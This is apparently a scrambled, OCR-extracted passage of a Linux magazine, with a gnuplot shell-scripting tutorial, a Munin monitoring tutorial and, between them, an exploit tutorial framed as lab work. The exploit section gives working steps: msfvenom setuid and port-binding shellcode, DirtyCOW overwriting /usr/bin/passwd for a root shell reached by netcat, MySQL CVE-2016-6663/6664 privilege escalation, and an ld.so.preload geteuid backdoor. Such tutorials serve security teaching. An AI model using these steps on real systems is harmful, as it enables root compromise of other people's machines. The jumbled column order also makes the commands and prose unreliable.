particularly economic and leads to errors that could be avoided. Fortunately, creating graphics from a shell script is not a difficult task. The gnuplot program, which has been part of all kinds of UNIX distributions for an age and a half, provides a variety of interesting graphing options and should be well known to anybody who frequents the Linux terminal. It, thus, makes for a more than fitting final installment of our trip through the fascinating realm of shell programming. As gnuplot is not exactly something that gets used every day, most distributions do not include it by default. Fortunately, installing it can be accomplished easily via the apt-get command: ~$ sudo apt-get install gnuplot [sudo] password for [username]: . . . The basic command contains only local rendering logic. Displaying data can be accomplished by installing either the Qt or the X11 package – your author swears by the following utility: ~$ sudo apt-get install gnuplot-qt Reading package lists... Done . . . After this, gnuplot can be started in interactive mode by entering its name into a terminal window. The first invocation of Gnuplot looks like this: ~$ gnuplot G N U P L O T . . . Terminal type set to 'wxt' By default, gnuplot starts out with its graphing terminal option set to wxt: it implies that a pop-up window will be displayed whenever there is something to graph. Our first example uses the plot command, which takes one or more functions which then gets shown: Figure 1 Above gnuplot can be used to plot commonly used mathematical functions ~$ gnuplot G N U P L O T . . . Terminal type set to 'wxt' gnuplot> plot sin(x) Figure 2 Above Setting the grid property enhances diagram output by including a backdrop grid Off Licence! gnuplot's name, in fact, is misleading: the product is not distributed under the GPL license, but uses a different licensing regime which does not permit the redistribution of changed source code packages. Developers must, instead, publish patches that can be applied against an officially released version of the program code. the creation of the script file. Embedding long sequences of text into shell scripts is best handled via the concept of a here document: it is a set of syntax markups that allow you to embed a long string into a shell script. Start out with the following example that demonstrates its use: #!/bin/bash Entering the command sequence printed leads to a pop-up display showing the contents of Figure 1. While this is not an unattractive option, the product is capable of a lot more. This is accomplished by setting state variables: the gnuplot program, even in interactive mode, is not completely stateless. One way to try this out involves the following command sequence, which is ideally entered right after you're started gnuplot: gnuplot> set grid gnuplot> plot sin(x), cos(x) gnuplot> When done, you are presented with the output shown in Figure 2. It is obvious that the set grid command motivates the program to display a grid in the background of any rendered diagrams. Be aware that Ctrl+C does not exit the gnuplot application – getting back to the operating system can only be accomplished by entering the quit command followed by the Return key. You're welcome HERE Even though running gnuplot directly is a fun way to get some charts on the screen, shell scripts work better if they can control the execution en masse via a set of parameters defined during Humans are less suited to processing text and perform much better when provided with graphical input gnuplot <<ENDOFTHISDOC set terminal wxt plot sin(x), cos(x) ENDOFTHISDOC In Bash, shell scripts containing HERE documents start out via a specified start-up sequence. This set of characters – in the case of our example, we use ENDOFTHISDOC – must be something that does not occur in the actual textual content found inside your document. Instead, it should act as a delimiter on the other side. In the case of our example, the here document consists of the set terminal and plot commands, which get passed into the main gnuplot invocation via the << command. Running the current version of the program leads to unsatisfactory results. The window containing the chart will pop up shortly, only to disappear again afterwards. This stupid behaviour is caused by a little oddity of gnuplot – by default, it removes all chart windows from the screen the moment the main application reaches the end of the script input provided. Fortunately, passing in the -persist parameter allows you to change this behaviour. A working version of our little charting program would look like this: #!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot sin(x), cos(x) ENDOFTHISDOC Run this version of the program to find yourself in front of a diagram showing both sine and cosine – an excellent tool for teaching more about trigonometry. 35 Tutorial Linearise me In some cases, transforming a set of values into a function is helpful as it allows the creation of more sophisticated models using the additional data generated from the function. This is a highly mathematical topic, which usually requires dedicated study of its own – O'Reilly's book Mastering Algorithms in C (. oreilly.com/product/ 9781565924536.do) contains a pretty good, understandable discussion of the process of polynomial interpolation. Bash masterclass File-a-Gogo! In most cases, the data that needs to be displayed does not take the form of a simple function: it, instead, tends to come as a series of values which must be passed to gnuplot via the corresponding command line functions. Embedding such information into the script is not particularly satisfactory – creating self-modifying shell scripts is an art of its own, which we cannot discuss in the frame of a single story. Fortunately, gnuplot can also take in plotting data from .pub files. Let us demonstrate this by creating a file called datasource.txt, and by populating it with a bit of data taken from the precious metal powerhouse KitCo (data taken from http://): 1 2 3 4 5 6 7 8 9 10 1236.45 1267.5 1281.4 1282.35 1283.05 1302.8 1301 1303.75 1288.45 1272 18.59 18.75 18.81 18.26 18.22 18.3 18.07 18.54 18.24 17.76 A cursory look at the structure of the file reveals that we have three columns: in addition to a handling sequence number, we have both the silver and the gold prices for ten consecutive trading days. Displaying this information in a naïve chart can be accomplished with the following bit of code: #!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot 'datasource.txt' using 1:2, 'datasource.txt' using 1:3 with lines ENDOFTHISDOC Here, two things are interesting. First of all, the file name is passed in using the '' moniker to designate the file name in question. Secondarily, we specify which column numbers are used as the two variables. As we plan to create one diagram line with gold and one with silver information, two using commands are used that are tied together using the comma operator. When done, run the program – its output will be similar to the one shown in the figure. This is a common problem in diagrams: if the values to be displayed are of significantly differing ranges, the use of a common axis leads to problems. In the case of our diagram, gold price information looks good while the smaller silver price data gets squashed. Fortunately, fixing the problem is really easy: change the here document in order to force gnuplot to use two independent axes: #!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt plot 'datasource.txt' using 1:2, 'datasource.txt' 36 Figure 3 Above One axis cannot be used to display two datasets efficiently if their values differ significantly using 1:3 with lines ENDOFTHISDOC Our example will yield a diagram showing the two price curves in a somewhat sensible format: sadly, axis information is displayed only for the gold price. A long-term mentor of this author – duly equipped with a PhD in physics from one of the most reputable institutes of Austria – once failed the author of this story for a technicality: his diagrams lacked axis descriptions, and thus were “meaningless”. While this might seem a bit extreme, adding context to diagrams is helpful as it prevents misinterpretation. As one can imagine, this is easily accomplished in gnuplot via the following modifications: #!/bin/bash gnuplot -persist <<ENDOFTHISDOC & set terminal wxt set ylabel 'Gold' set y2label 'Silver' set xlabel 'Trading days' set y2tics autofreq plot 'datasource.txt' using 1:2 axes x1y1, 'datasource.txt' using 1:3 axes x1y2 with lines ENDOFTHISDOC We start out by using the x- and ylabel commands to assign textual descriptions to the axes. Next, the y2tics attribute is set to autofreq: this instructs gnuplot to find the optimal step values using its internal logic. In addition to that, it also overwrites the default settings: if left to its own devices, gnuplot will display ticks only on the first axis of the diagram. With that, it is time to run our standalone example for one last time. This figure shows what you can expect. File ahoy! Displaying diagrams is interesting as long as the shell script is run interactively – if your script is offline, it would be more interesting to create a file which can then be distributed via email or SCP transfer. This can be accomplished by redirecting gnuplot's terminal instance to make it output information into the file rather than to a window shown on the frame buffer. Let's try this by modifying the precious metal charting program – a sharply abridged version omitting the state variable code for brevity looks like this: Figure 4 Above Creating an unambiguous diagram takes but a few commands #!/bin/bash gnuplot <<ENDOFTHISDOC & set terminal png set output 'goldchart.png' ... plot 'datasource.txt' using 1:2 axes x1y1 . . . ENDOFTHISDOC This gnuplot invocation differs from the normal ones in that it first sets the Terminal to png, thereby instructing the program to plot to a PNG file. Set output is then used to specify the name of the file that is to be generated, after which commands can be issued. When run, the file containing the shell script will be populated with a graphics file. It can then be forwarded to its final destination using a file transfer command of choice. Differing data Now that you have a separate .pub file loaded into the gnuplot at runtime, we can change the program's behaviour in order to put out data collected by the main shell script during its execution. One good example for this would be a plot showing ping times to a server – under an assumption of a permanently working network connection, we could assume the sending of ten packages to be accomplished in about ten seconds. This makes ping an ideal candidate for the final following bit of data (the numbers are likely to be different): root@tamhan-thinkpad:~/Desktop/DeadStuff/2016Nov/ AprilBash8# cat pingstore.dat of 50.7 50.3 204 53.5 50.4 51.0 50.9 57.8 50.0 53.0 Fortunately, this problem can be solved via grep. When invoked as shown, the program will limit its output to purely numeric data: ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat With that, but one problem remains: graphing the content of the dat file: #!/bin/bash ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat gnuplot -persist <<ENDOFTHISDOC & plot 'pingstore.dat' with lines ENDOFTHISDOC Our last example is special in that it simply provides gnuplot with the pingstore file and instructs it to use lines for the drawing operation. gnuplot's internal algorithms will proceed to generating a numerical sequence for the X axis, thereby ensuring that the diagram looks great. An entire book has been written about Gnuplot – someone who does a lot of diagramming should definitely spend a bit of If the values to be displayed are of significantly differing ranges, the use of a common axis leads to problems diagramming application of this tutorial – showing a historical trend of connection reliability over time gives an additional set of meaning to your data. Sadly, the output of ping is not directly usable: gnuplot expects uniform numeric values, and is unlikely to be able to parse the output directly. Piping can solve this problem – the awk utility allows you to cut out parts of texts easily. For example, the following line would cut out the relevant column: ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} > pingstore.dat When run, the file pingstore.dat for this author will contain the time with the man page of the product. For the average user, however, the instructions discussed in this story are more than enough. And with that, our trip through the realm of shell scripting has come to an end. Even though we covered an amazing amount of ground, this is, by far, not everything that can be said about shell scripts. Should you find yourself performing any kind of task over and over again, you should definitely consider looking for a shell script to handle it instead – thanks to the openness and chattiness of UNIX administrators, a simple Google search is likely to yield more results than you could have imagined in your wildest dreams. 37 Tutorial Exploits Analyse, adjust and run exploits in a controlled environment Running exploits out-of-the-box is a perilous business: it can lead to a total system crash is delivered (at some point and by using different techniques) to the vulnerable application. You can write shellcode from scratch or by using msfvenom, a tool within the Metasploit Framework. WebSecurity Dojo architecture is x86, so let's generate an ELF32 binary that will spawn a new shell. Type this in your Kali Linux terminal: Toni Castillo Girona holds a bachelor's degree in Software Engineering and works as an ICT research support expert in a public university sited in Catalonia (Spain). He writes regularly about GNU/Linux in his blog: disbauxes.upc.es. msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f elf > myshell Try it; copy the file to your WebSecurity Dojo VM: Above By executing the ptrace-based exploit, we can overwrite /usr/bin/passwd and gain a root shell Resources WebSecurity Dojo Installation bit.ly/2fvdkfx Kali Linux installation bit.ly/19pOpAj Msfvenom bit.ly/1KBC8aM DirtyCOW bit.ly/2f0Giks Ptrace bit.ly/1stOb70 JD-GUI MySQL CVE-20166663 bit.ly/2e5sng4 MySQL CVE-20166664 bit.ly/2eDrNCF MySQL system crash video tinyurl.com/zdejlkz Quite a few dangerous vulnerabilities have popped out lately, most of them exploitable by means of executing different Proof of Concept (PoC) scripts. Some of them even come with catchy names too (i.e. DirtyCOW). Sometimes these PoCs work out-of-the-box, but sometimes they don't. So if a PoC does not yield the expected result, it does not necessarily mean that it has not affected the system in some way. If you execute an exploit and it does not work, maybe it is because that particular system is either not vulnerable or the PoC needs to be adjusted. Worstcase scenario: the exploit damages the system. This is why you need to analyse what the exploit really does, understand the vulnerability it is based on, and execute it in a controlled environment (i.e. a virtual machine). This tutorial will provide you with a general understanding of exploits by playing with three of the latest ones out there (as of this writing): CVE-2016-5195, CVE-2016-663 and CVE-2016-6664, along with a brief stepby-step guide to shellcode. Exploits are coded in all sorts of programming languages: C, Perl, Python, Ruby‌ Even in Bash. It is a good idea to analyse a particular exploit and then re-code it using your preferred language to prove that you have understood what it does. Prepare your test lab First things first: you don't want to go around executing exploits against a real computer! You need to set-up a test lab first. To follow this tutorial, you have to install two virtual machines (VMs): WebSecurity Dojo 2.0 and Kali Linux (See References). Once both VMs are up and running, open a new shell in both VMs and read on! Generate shellcode Shellcode is commonly found in exploits. It is machine code that 38 Ethical hacking The information in this tutorial is for security testing purposes only. It is illegal to use these techniques on any computer, server or domain that you do not own or have admin responsibility for! scp myshell dojo@YOUR_DOJO_IP: From within WebSecurity Dojo, you need to type these commands to change the owner and finally set the execution and sticky bits on myshell: sudo chown root:root myshell sudo chmod 4755 myshell Execute it as user dojo and you will get a new root shell: ./myshell bash-4.2# Convert the shellcode to a C-char buffer (hex op-codes) You can tell msfvenom to output the payload using different formats. By using elf as before, you are in fact generating a Linux executable that can be run out-of-the-box. You can play with different formats and see what happens (-f). It is common to embed shellcode inside a PoC script. This PoC can be written in C, Python, or whatever. So you need to adjust the payload format accordingly so it fits nicely within your PoC. Let's imagine you want all the bytes from our previous payload to be converted into a C-char buffer. To do so, type this in WebSecurity Dojo: xxd -i myshell A byte-by-byte representation of myshell will be outputted as a C-char array along with its length: unsigned char myshell[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01... }; unsigned int myshell_len = 136; Convert shellcode to assembly More often than not you will be using an exploit coded by someone else. This exploit could contain shellcode. You need to understand the shellcode before running it! Go to Kali Linux and generate this new shellcode in C format: msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f c > myshell Now open your favourite ASCII editor and create a new C source file. Write this down (replace the placeholder with the output of the previous command): #include <stdio.h> <PASTE_THE_SHELL_CODE_HERE> void main(int argc, char **argv) { } Save it as exploit.c. Compile it and then open the binary within a gdb session: gcc exploit.c -o exploit gdb -q exploit The shellcode will be located at the address pointed to by buf[]. Use the disassemble command in gdb with this particular address to obtain the exploit code: (gdb) disass &buf 0x0804a040 <+0>: 0x0804a042 <+2>: 0x0804a044 <+4>: 0x0804a045 <+5>: ... xor push pop int %ebx,%ebx $0x17 %eax $0x80 Because &buf points to a bunch of op-codes, gdb has no trouble at all in disassembling them! Overwrite files with DirtyCOW DirtyCow is a kernel race condition bug that allows any non- will be able to recover the previous VM state. This PoC will allow you to write a string to a file owned by root for which you have read-only permission. First, create the file and put some text in it: sudo echo "Root file" > test sudo chmod 0404 test Now, run the exploit: ./dirtyc0w test "HELLO" ... procselfmem -100000000 If you read the file again, you will see that the exploit has failed. Indeed, the contents of test have not been altered at all. The exploit output itself pinpoints where the error could be: procselfmem -100000000. Using your favourite ASCII editor, open the exploit source code and look for the procselfmem string. The code belongs to one of the two threads of the exploit: procselfmemThread: Looking for SUID root binaries Whenever trying to escalate privileges (as seen in this tutorial), it is common to look for SUID root files that could be used to achieve this goal. You can rely on the old find command to list all the SUID root files in your system. Type this in a new terminal: find / -xdev -user root \( -perm -4000 -o -perm -2000 \). 1 for(i=0;i<100000000;i++){ 2 lseek(f,(uintptr_t) map,SEEK_SET); 3 c+=write(f,str,strlen(str)); 4 } printf("procselfmem %d\n\n", c); The idea behind DirtyCOW is to trigger a race condition between two threads: one calling madvise() and the other writing over and over to the file mapped into the process address space using / proc/self/mem. As the previous output implies, a negative number means that every single call to the write function has failed (line 3). In other words, you are not allowed to write to / proc/self/mem, apparently. However, there is another way to write to a process address space: enter ptrace()! Now let's try the second PoC; download it first: wget -no-check-certificate. githubusercontent.com/dirtycow/dirtycow.github.io/ master/pokemon.c You need to analyse what the exploit really does and execute it in a controlled environment (VM) privileged user to write to any read-only file (even those that belong to other users, such as root). Therefore, it can lead to privilege escalation by overwriting SUID root binaries. WebSecurity Dojo 2.0 is vulnerable to DirtyCOW. Let's play with this bug; download your first exploit using WebSecurity Dojo: wget -no-check-certificate. githubusercontent.com/dirtycow/dirtycow.github.io/ master/dirtyc0w.c This exploit has been coded in C, therefore you have to compile it: Compile it: gcc -pthread pokemon.c -o pokemon Try to overwrite test once again: ./pokemon test HELLO Finally, read the test file and be amazed: cat test HELLOfile gcc dirtyc0w.c -o dirtyc0w -pthread Now, take a snapshot of your VM before executing the exploit by pressing right-CTRL+T; this way, if something goes wrong, you This time it has worked. But why? We were not able to write to / proc/self/mem directly, so the new exploit uses a call to ptrace to achieve the same goal. Instead of having a second thread 39 Tutorial Tools for privilege escalation If you have local access to a computer, you can use plenty of tools to look for potentially insecure file permissions (SUID root, world-writable), misconfiguration of some system services, weak passwords, and so on. Go Google their names: LinEnum, unix-privesc-check, Lynis‌ Have fun! Exploits calling write(), we have now a second thread calling ptrace to write each byte at a time (lines 4-6) to the address where a copy of test is mapped: 1 for(i=0;i<10000/l;i++) 2 for(o=0;o<l;o++) 3 for(u=0;u<10000;u++) 4 c+=ptrace(PTRACE_POKETEXT,pid, 5 map+o, 6 *((long*)(argv[2]+o))); The way this exploit is written follows the standard approach for debugging a child process from its parent by means of calling fork() and ptrace(PTRACE_TRACEME) (See References). Exploiting this bug allows us to overwrite files but not to append data to them. Gain a root shell with DirtyCOW If you combine what you have learned so far about shellcode with the ptrace technique, you can overwrite any file with shellcode. If the file you are overwriting is SUID root, you will be able to spawn a root shell. Go get the next exploit: wget -O c0w.c Compile it and execute it: the shellcode so that we can connect remotely to the server as soon as passwd is executed. Go back to your Kali Linux and generate a new ELF32 binary that will listen on TCP port 8080, spawning a root shell as soon as a connection is made (this is known as port-binding shellcode): msfvenom -p linux/x86/shell_bind_tcp -a x86 LPORT=8080 -f elf |xxd -i > payload Replace the bytes of the shell_code[] buffer inside c0w.c in WebSecurity Dojo with these new ones. Because the shellcode length is different, don't forget to change sc_len too: unsigned int sc_len = 162; Recompile the exploit and run it; then execute passwd: passwd& Go back to your Kali VM and use netcat to connect to WebSecurity Dojo: nc YOUR_DOJO_IP 8080 You are now connected to the VM remotely. Type the command whoami to find out if you are, indeed, root: gcc c0w.c -pthread -o c0w ; ./c0w This exploit makes a copy of /usr/bin/passwd to /tmp/bak and then it will overwrite it with the shellcode you have generated using msfvenom. As a result, as soon as any user executes the command passwd, a root shell will be spawned. Try it: ~$ passwd Segmentation fault Oops! Depending on your VM capabilities, you could be presented with a root shell instead of firing a segfault. Why the segfault? Remember that DirtyCOW is a race condition bug. You have two threads running on the same computer. If madvise() finishes before the main process calling ptrace() has written every singe byte of the shellcode to the address where a copy of passwd is located, the ELF file will be corrupted. In this case you have to increase the number of iterations for the madvise() thread: sudo cp /tmp/bak /usr/bin/passwd ./c0w passwd root@dojo2:/home/dojo# whoami root Change the value for the i variable to something greater, say 900000000 (line 3); re-compile the exploit and try again (don't forget to restore the original passwd file from /tmp/bak): How to overwrite passwd using a port-binding shellcode Now that you are comfortable enough with this PoC, let's change 40 whoami root Escalate privileges in MySQL It turns out that WebSecurity Dojo is also vulnerable to the latest MySQL CVEs. Download the first exploit: wget --no-check-certificate -O 40678.c Install the MySQL client libraries and compile the exploit: sudo apt-get install libmysqlclient-dev gcc 40678.c -lmysqlclient -I/usr/include/mysql -o 40678 This exploit gains a mysql-suid shell when executed locally on a vulnerable mysql version. In order to exploit it, you need some valid database credentials first. Create a new database user with some privileges on the DVWA database: mysql -u root -p mysql> use dvwa; mysql> GRANT CREATE,SELECT,INSERT,DROP ON dvwa.* TO attacker@localhost IDENTIFIED BY 'password'; mysql> exit Use these credentials to run the first exploit: ./40678 attacker password localhost dvwa [+] Bingo! Race won (took 4 tries) [+] Spawning the mysql SUID shell now mysql_suid_shell.MYD-4.2$ You will be presented with a shell; first of all, you should now check that you have obtained a mysql-shell by issuing the whoami command: mysql_suid_shell.MYD-4.2$ whoami mysql From here you can escalate even more privileges by exploiting either CVE-2016-6662 or CVE-2016-6664. Let's try the second one. Open a new terminal in your WebDojo VM and download the second exploit: wget --no-check-certificate -O 40679.sh This time it is a shell script written in Bash. You can set its execution bit first: chmod +x 40679.sh If you execute the script you will get an error: ./40679.sh : invalid option Let's start afresh: stop the service, delete the error log file and finally start MySQL again: service mysql stop rm -rf /var/log/mysql/error.log service mysql start Execute the second exploit from within the MySQL shell: mysql_suid_shell.MYD-4.2$ ./40679.sh /var/log/ mysql/ error.log ‌ [+] Waiting for MySQL to re-open the logs/MySQL service restart... Do you want to kill mysqld process to instantly get root? :) ? [y/n] At this point, if you press y and then Enter, the script will perform a killall mysqld, thus making mysqld_safe create a new error.log file from scratch. Because now / var/log/mysql/error.log points to /etc/ld.so.preload (it is a soft link), the error log will be stored in /etc/ld.so. preload (this is known as a symlink attack). The exploit iterates until it sees this file, at which point it will try to add the malicious library to it (line 4) and then delete the $ERRORLOG file (line 5): Fix it with the dos2unix command: sudo apt-get install dos2unix dos2unix 40679.sh This new technique can gain root access by means of diverting the MySQL error log file to /etc/ld.so.preload, then replacing its contents with a malicious library (generated and compiled within the Bash script). This library will then be preloaded by the linker, thus replacing the call to geteuid() with this malicious one: 1 uid_t geteuid(void) { 2 static uid_t (*old_geteuid)(); 3 old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 4 if ( old_geteuid() == 0 ) { 5 chown("$BACKDOORPATH", 0, 0); 6 chmod("$BACKDOORPATH", 04777); 7 } 8 return old_geteuid(); 9} This will make a copy of $BACKDOORPATH (i.e., /bin/bash) with SUID root privileges. For this to work, mysqld_safe must be running. Edit /etc/init/mysql.conf and make sure mysqld_ safe is executed instead of mysqld: 1 2 3 4 5 6 7 8 while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done Depending on how fast your VM is, you may or may be not successful in executing this exploit out-of-thebox. The worst-case scenario is the file is temporarily owned by root until mysqld_safe executes chown (thus changing the ownership of /etc/ld.so.preload to mysql). If the exploit tries to overwrite /etc/ld.so.preload it will fail (the exploit is run as mysql). The exploit will continue its execution until its very last line. What we will have by then would be a few MySQL error log entries in /etc/ld.so. preload, and because this file is system-wide, every single binary that we try to execute afterwards will complain about not being able to pre-load a bunch of unknown objects. If a privileged user reboots the computer, a total system crash could happen. One way to fix this is by increasing the sleep parameter or by making sure the file has been successfully overwritten before breaking the loop and deleting $ERRORLOG (lines 5-7): exec /usr/bin/mysqld_safe Finally, edit /etc/mysql/conf.d/mysqld_safe_syslog.cnf and set the path for error.log: log-error=/var/log/mysql/error.log 4 5 6 7 8 echo $PRIVESCLIB > /etc/ld.so.preload if [ $? -eq 0 ]; then rm -f $ERRORLOG break; fi 41 Tutorial Munin Monitor your network with Munin Learn how to install and configure Munin on a Linux system to monitor network computers Nitish Tiwari is a software developer by profession, with a huge interest in Free and Open Source software. As well as serving as community moderator and author for leading FOSS publications, he also helps organisations adopt open source software for their business needs. Resources Munin. org/ A computer network is not complete without a resourcemonitoring component. While there is no dearth of such monitoring tools, a tried and tested tool is always better than relatively new tools – especially when it comes to network uptime and reliability. In this tutorial we will take a look at one such reliable networked resource monitoring tool called Munin. It lets you easily monitor the performance of not only your computers, but networks, SANs, applications, and various other resources. Written in Perl, Munin is easily extensible and its plugins can be written in any language. You can extend the functionality to monitor specific resources via Munin plugins. Architecturally, Munin has a master/node design where the master connects to all the nodes at regular intervals and asks them for data. The master keeps track of the incoming data and any changes therein and serves this information to the end user via a web based interface. Munin is available for almost all the major Linux distributions, including Debian, Ubuntu, Fedora and Red Hat among others. In this tutorial, we’ll see how to install and get started with Munin, followed by how to configure it in a network. We’ll also take a look at some of the interesting Munin plugins and see how to write your own Munin plugins. 01 42 $ sudo apt-get install munin-node Install Munin As Munin is based on a master/node architecture, you’ll need to choose the software package to be installed based on the role the machine is going to play. For example, if a machine is going to serve as the master, you need to install the munin-master package on that machine. By master, we mean the machine that is going to collect data from all nodes, and serve the results to the end users. The munin-master runs munin-httpd, a basic webserver that provides the munin web interface on port 4948/tcp. If you’re just starting with Munin or have just a few nodes in your network, it should be enough to install the munin-master on one machine. On all the other machines in the network (that are going to be monitored), you need to install the munin-node package. We have taken Ubuntu 16.04 as the host system for this tutorial. To install the munin-master package, type the following: $ sudo apt-get install munin Right The Munin monitoring home page on a Munin master system. The top-left corner shows the possible problems in different categories Similarly, you can install the munin-node package by typing: 02 Munin master configuration Once you have both the master and node packages installed on the relevant machines, you’ll need to configure them so that they can talk to each other. Additionally, Munin master needs to have the web server configured to be able to serve network status via webpages. All the configuration files are present in the folder /etc/munin. Let’s first configure Munin master. To start with, open the configuration file like this: $ cd /etc/munin/ $ sudo nano munin.conf Then look for the lines starting with dbdir. This section defines the directories that store various Munin master files.. There are a number of situations where you’d like to run munin-node on hosts not directly available to the Munin server Muninnode for Windows file we'll be modifying is apache.conf, Munin's Apache configuration file. This file is sym-linked to /etc/apache2/ conf-available/munin.conf, which, in turn, is sym-linked to /etc/apache2/conf-enabled/munin.conf. Open the file to allow editing: $ sudo nano apace.conf Uncomment all these folder paths by removing the preceding # sign. Also, be sure to change the htmldir from /var/cache/ munin/www to the actual web directory as per the web server configuration. We have used the path, /var/www/munin. Next, look for the first host tree. It defines how to access and monitor the host machine. It should read: [localhost.localdomain] address 127.0.0.1 use_node_name yes Change the name of that tree to one that uniquely identifies the server. This is the name that will be displayed in the Munin web interface. Then, you’ll need to add all the nodes you’d like to monitor in one of these formats. For example, add a node’s IPv4 address using this format: Munin Node for Windows, i.e. munin-node-win32, is a Windows client for the Munin monitoring system. It is written in C++, with most plugins built into the executable. This is different from the standard munin-node client, which only uses external plugins written as shell and Perl scripts. The configuration file munin-node.ini uses the standard INI file format. At the very top of the file, modify the first line to /var/www/ munin, the same as the htmldir path you specified in munin. conf. Next, look for the Directory section, and change the directory to /var/www/munin. Also comment out the first four lines and then add two new directives so that it reads: <Directory /var/www/munin> #Order allow,deny #Allow from localhost" \t "_blank" 127.0.0.0/8 ::1 #Options None Require all granted Options FollowSymLinks SymLinksIfOwnerMatch ……. …….. </Directory> [node.example.com] address 192.0.2.4 If you have DNS configured, you can also use the FQDN of the node instead of its IP address. [node2.example.com] address node2.example.com Munin also supports IPv6, so you can add a node’s IPv6 address in the below format. [node3.example.com] address 2001:db8::de:caf:bad 03 Munin master web server configuration Within the same /etc/munin directory, the next You need to change the last and second-to-last Location sections in a similar manner to finish the configuration. Finally, restart the Apache and munin-node services. You should then be able to access Munin at. 04 Adding nodes To configure Munin nodes, you’ll need to edit the /etc/ munin/munin-node.conf file. The first step is to allow access to the master, so it can query the node. A Munin node listens on all interfaces by default, but because of restrictive access list, you need to add your master’s IP address for the monitoring to work. The ‘cidr_allow’, ‘cidr_deny’, ‘allow’ and ‘deny’ statements can be used to list the master’s IP address. With cidr_allow you can use the following syntax: cidr_allow 127.0.0.0/8 43 Tutorial Munin the nodes. To enable tracking via SSH tunneling you need to add a node like this: [ssh-node] address 127.0.0.1 port 5050 Then establish a SSH connection using the following: $. cidr_allow 192.0.2.1/32 Now allow uses regular expression matching against the client IP address: allow ‘^127.’ allow ‘^192.0.2.1$’ The next step in configuring the Munin node is to decide which plugins to use. Once you have decided, just add the plugin file to the directory /etc/munin/plugins. The Munin node runs all plugins present in that directory. Note that Munin has a plug-and-play architecture with no restrictions on how and when a node can be added to the network. So, whenever you need to add a new node to your existing network (that is being monitored by Munin), you can simply install the Munin node using the command mentioned earlier and allow access to the Munin master (using the configuration explained earlier). This will ensure the new node is being monitored by Munin. 05 Monitor hosts that aren’t directly reachable There are a number of situations where you’d like to run a Munin node on hosts not directly available to the Munin server. For example, consider a scenario where a UNIX server sits between the Munin server and one or more Munin nodes. The server in between reaches both the Munin server and the Munin node, but the Munin server does not reach the Munin node or vice versa. There are various approaches to handle such scenarios; we’ll look at SSH tunnelling. With SSH tunnelling only one SSH connection is required, even if you need to reach several hosts on the other side. The Munin server can listen to different ports on the localhost interface and track 06 Munin plugins key value format. For example, the ‘load’ plugin, which comes as standard with Munin, will output the current system load: $ munin-run load load.value 0.03 The default directory for plugins is /usr/share/munin/ plugins/. You can activate a plugin by creating a symbolic link in the servicedir (usually /etc/munin/plugins/ for a package installation of Munin) and restarting the Munin node. The Munin installation procedure uses the utility muninnode-configure to check which plugins are suitable for your node and create the links automatically. It is called every time a system configuration changes (services, hardware, etc) on the node and it will adjust the collection of plugins accordingly. 07 Munin plugin invocation By default, about a dozen set of plugins are installed and active. In its most common form, a plugin is a small perl program or shell script. The plugins are run by munin-node, and they are invoked when successfully contacted by the munin master. When this happens the munin-node runs each plugin twice – once with the argument config to get graph configuration, and once again with no argument to get graph data. This is how they’re handled in a plugin. 44 When a plugin is invoked with the config argument it is expected to output configuration information for the graph it supports. This output will consist of a number of attributes divided into two sets – global attributes and another set of data source-specific attributes. You can check out the details at list via this link: reference/plugin.html However, when the node receives a fetch command for a plugin the plugin is invoked without any arguments on the command line and is expected to emit one or more field. value attribute values, one for each thing the plugin observes as defined by the config output. The plotting of graphs may be disabled by the config output. 08 graph_vlabel load load.label load Munin alarms EOM exit 0;; esac printf "load.value " cut -d' ' -f2 /proc/loadavg Sample Munin plugin Let’s create a sample Munin plugin. We’ll take the example of the Load Average plugin and write it in shell script. In this plugin we want to be able to track a node’s overall average load. There is a Linux file that has the info: /proc/ loadavg. So, let us first read the file and format the output: $ cut -d' ' -f1 /proc/loadavg 0.09 Also, Munin wants the value in a more structured form, so let’s structure it further: # printf "load.value "; cut -d' ' -f2 /proc/ loadavg load.value 0.06 Here the load is called the field or field name, the value is the attribute, and the number is the value. The next step is to make sure the plugin accommodates the mandatory requirement of responding with graph-related details when called with the config argument. Minimal output should look like this: 09 Munin buddyinfo plugin Linux manages virtual memory on a page granularly. There are some operations, however, which require physically contiguous pages to be allocated by the kernel. Such allocations may possibly fail if the memory gets fragmented, even when there are enough pages free, but they are not contiguous. /proc/buddyinfo helps to visualise free memory fragments on your Linux machine. The Munin buddyinfo plugin can track this info on all the nodes of your network and help you monitor it from the master. This plugin monitors the amount of contiguous areas, called higher order pages. The order means the exponent of two of the size of the area, so order 2 means 2^2 = 4 pages. Munin has a generic interface for sending warnings and errors. If a Munin plugin discovers that a plugin has a data source breaching its defined limits, Munin is able to alert the administrator either through simple commandline invocations or through using a monitoring system like Nagios or Icinga. Note that if the receiving system can cope with only a limited number of messages at the time, you can use the directive contact. contact.max_ messages. graph_title Load average graph_vlabel load load.label load This is to make sure that when munin-master gets data from the plugin, it knows how to plot the data in a graph. Here is the final plugin in one file. #!/bin/sh case $1 in config) cat <<'EOM' graph_title Load average The plugins are run by munin-node, and invoked when contacted by the munin master 10 Munin proc plugin The Munin proc plugin is used to monitor various aspects of named processes. You can configure it by supplying a pipe-delimited list of parameters through environment variables. env.procname defines the processname as seen inside the parenthesis of the second column in /proc/<PID>/ stat. If you don't get the data you expect, you can check if the value is what you expect here. This is used for the first filter. Then args/user-filters is applied on top of this filter. Note that <PID> is the process ID of the process that you are interested in. Process names including non-alphanumeric characters (like space, dash, etc) are Special Process Names. Also, note that if the process name (in env.procname) contains any characters other than [a-zA-Z_], they will be internally replaced by underscores __. 45 Tutorial Mihalis Tsoukalos is a UNIX administrator, a programmer (UNIX & iOS), a DBA and a mathematician. He has been using Linux since 1993. You can reach him at @mactsouk (Twitter) and his website: mtsoukalos.eu Resources An installation of Erlang A text editor such as Emacs or vi Erlang Program in Erlang: Functions Discover Erlang functions and basic 